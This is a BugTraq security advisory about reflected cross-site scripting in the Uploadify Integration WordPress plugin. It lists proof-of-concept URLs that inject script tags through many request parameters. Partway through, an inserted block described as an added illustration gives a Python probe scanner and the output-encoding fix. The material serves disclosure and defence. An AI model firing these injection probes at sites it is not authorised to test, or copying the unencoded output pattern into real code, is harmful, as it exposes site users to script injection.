BugTraq
[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin Apr 06 2012 02:02PM
From: come2waraxe (at) yahoo (dot) com

[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
===============================================================================

Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-85.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Uploadify Integration allows you to insert a jQuery Uploadify uploader into your
forms. Features: uses jQuery Uploadify; automatically saves to post meta, user
meta, an option, or temporary storage depending on the metaType selected by the
shortcode; allows more than one shortcode per page.

http://wordpress.org/extend/plugins/uploadify-integration/

Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected: Uploadify Integration 0.9.6; older versions may be affected as well.

###############################################################################
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"
###############################################################################

Reason: request-controlled values are written into the HTML output without output encoding
Attack vector: user-submitted GET or POST parameters
Preconditions: "register_globals=On". The view script is reachable directly under wp-content/plugins/, and with register_globals enabled every request parameter named below becomes a PHP global of the same name, which is how it reaches the template's output. Note that register_globals was deprecated in PHP 5.3 and removed in PHP 5.4, so the attack as described needs PHP 5.3 or older with that setting enabled.
Result: reflected XSS, i.e. attacker-supplied JavaScript runs in the victim's browser within the origin of the WordPress site

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed

###############################################################################
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"
###############################################################################

Reason: request-controlled values are written into the HTML output without output encoding
Attack vector: user-submitted GET or POST parameters
Preconditions: "register_globals=On" (same mechanism as in section 1)
Result: reflected XSS

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed

###############################################################################
3. Reflected XSS vulnerability in "views/scripts/file/error.php"
###############################################################################

Reason: request-controlled values are written into the HTML output without output encoding
Attack vector: user-submitted GET or POST parameters
Preconditions: "register_globals=On" (same mechanism as in section 1)
Result: reflected XSS

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed
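The three findings above share one root cause (request parameters echoed into an HTML attribute or element unencoded), so a single added example covers all three sections. The Python below is an added illustration and is not code from this advisory or from the Uploadify Integration plugin: it builds the probe URLs from the parameter lists given above, decides from a response body whether the probe came back unencoded, and shows the attribute encoding that would have neutralised the `">` break-out. The plugin base URL, the `render_hardened` template, and the offline `fetch` stub used when testing are assumptions for illustration.

```python
"""Added example (not from the advisory or the plugin): probe builder,
reflection check and the output encoding that fixes the bug."""
import html
from urllib.parse import urlencode, urljoin
from urllib.request import urlopen

# Parameter names per view script, exactly as listed in the advisory.
VULNERABLE_PARAMS = {
    "views/scripts/shortcode/index.php": [
        "inputname", "buttontext", "filetypeexts", "filetypedesc",
        "filesizelimit", "uploadmode", "metatype", "parentid", "path", "url",
    ],
    "views/scripts/partials/file.php": ["fileid", "inputname"],
    "views/scripts/file/error.php": ["error"],
}

# Same probe the advisory uses: closes the surrounding attribute and tag, then
# injects a script element. String.fromCharCode(88,83,83) evaluates to "XSS".
PROBE = '"><script>alert(String.fromCharCode(88,83,83))</script>'


def build_probe_urls(plugin_base, probe=PROBE):
    """Return (path, parameter, url) for every parameter the advisory lists.

    plugin_base is the plugin directory URL (assumed example:
    http://localhost/wp331/wp-content/plugins/uploadify-integration/).
    """
    if not plugin_base.endswith("/"):
        plugin_base += "/"
    urls = []
    for path, params in VULNERABLE_PARAMS.items():
        for name in params:
            url = urljoin(plugin_base, path) + "?" + urlencode({name: probe})
            urls.append((path, name, url))
    return urls


def is_reflected_unencoded(body, probe=PROBE):
    """True if the probe appears in the body byte-for-byte, i.e. neither the
    quote nor the angle brackets were encoded on output. A hit proves
    unencoded reflection; the exact rendering context still needs a look."""
    return probe in body


def escape_attr(value):
    """What the templates should do before writing a value into an attribute.
    html.escape(quote=True) encodes & < > " and '. The WordPress equivalent
    is esc_attr(); plain PHP would use htmlspecialchars($v, ENT_QUOTES)."""
    return html.escape(value, quote=True)


def render_hardened(inputname):
    """Hardened rendering of a hypothetical (assumed) input element; the
    vulnerable form would interpolate inputname verbatim into the attribute."""
    return '<input type="file" name="%s">' % escape_attr(inputname)


def check_target(plugin_base, fetch=None):
    """Request every probe URL and report the (path, parameter) pairs that
    echo the probe unencoded. `fetch` is injectable so the logic can be run
    offline; by default it performs a real HTTP GET, so only point it at
    hosts you are authorised to test."""
    if fetch is None:
        def fetch(url):
            with urlopen(url, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
    findings = []
    for path, name, url in build_probe_urls(plugin_base):
        try:
            body = fetch(url)
        except OSError:
            continue  # unreachable file or connection error: not a finding
        if is_reflected_unencoded(body):
            findings.append((path, name))
    return findings


if __name__ == "__main__":
    # Offline demonstration with a constructed response: the probe reflected
    # verbatim is flagged, the same value after escape_attr() is not.
    print(is_reflected_unencoded('<input name="' + PROBE + '">'))
    print(is_reflected_unencoded(render_hardened(PROBE)))
    print(render_hardened(PROBE))
```

Because `urlencode()` percent-encodes the probe, the generated URLs differ textually from the raw ones listed in the advisory but decode to the same parameter values server-side. The encoding fix alone closes the XSS; independently of it, view scripts that are never meant to be requested on their own should refuse direct access, and a PHP 5.4 or newer host is not exploitable as described because register_globals no longer exists there.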

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe (at) yahoo (dot) com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------
